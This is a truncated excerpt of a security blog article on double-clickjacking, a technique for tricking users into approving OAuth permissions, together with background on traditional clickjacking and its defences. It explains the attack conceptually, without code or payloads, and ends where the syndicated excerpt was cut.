In our last blog, we discussed how OAuth-based consent phishing attacks have been used to trick users into giving malicious apps the permission to conduct malicious activities via an employee’s account. This attack has been extremely effective due to the lack of awareness of how attackers can misuse OAuth permissions. Now, let’s say we are in an ideal world where with ample security training most employees are now aware of consent phishing and scrupulously reads every OAuth permissions request, will we truly be immune to OAuth identity attacks?
Paulos Yibelo’s recent unveiling of double-clickjacking attacks suggests otherwise. This new attack mechanism exploits the routine double-click action to open up the OAuth screen for a split second in between clicks, deceiving users into authorizing a permission without them even knowing. These screen changes happen so fast that it is impossible for even the most vigilant user to know they have become victims to a double-clickjacking attack.
This article will explore the details on double-clickjacking works, how it’s different from traditional clickjacking and the ultimate question of how do we even stop something that we don’t know is happening?
A Trip Down Memory Lane: Revisiting Clickjacking
For those who have spent some time in security, clickjacking is likely not an unfamiliar term. Clickjacking is a technique attackers use to manipulate users into clicking on something different from what they perceive. This could involve tactics such as embedding disguised/ invisible buttons, manipulating iframe layers or cursorjacking, where the attacker alters the position of the cursor such that the cursor’s real position is different from what users see.
How have we dealt with clickjacking?
From Facebook’s likejacking attacks to Twitter’s war against clickjackers, the early 2010s saw a slew of clickjacking attacks targeting major social media platforms and brands. Since then, clickjacking has largely become solvable in two ways:
- From the user side (Same Site: Lax) — most modern browsers now prevent cross-site cooki
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.This article has been indexed from Security BoulevardRead the original article: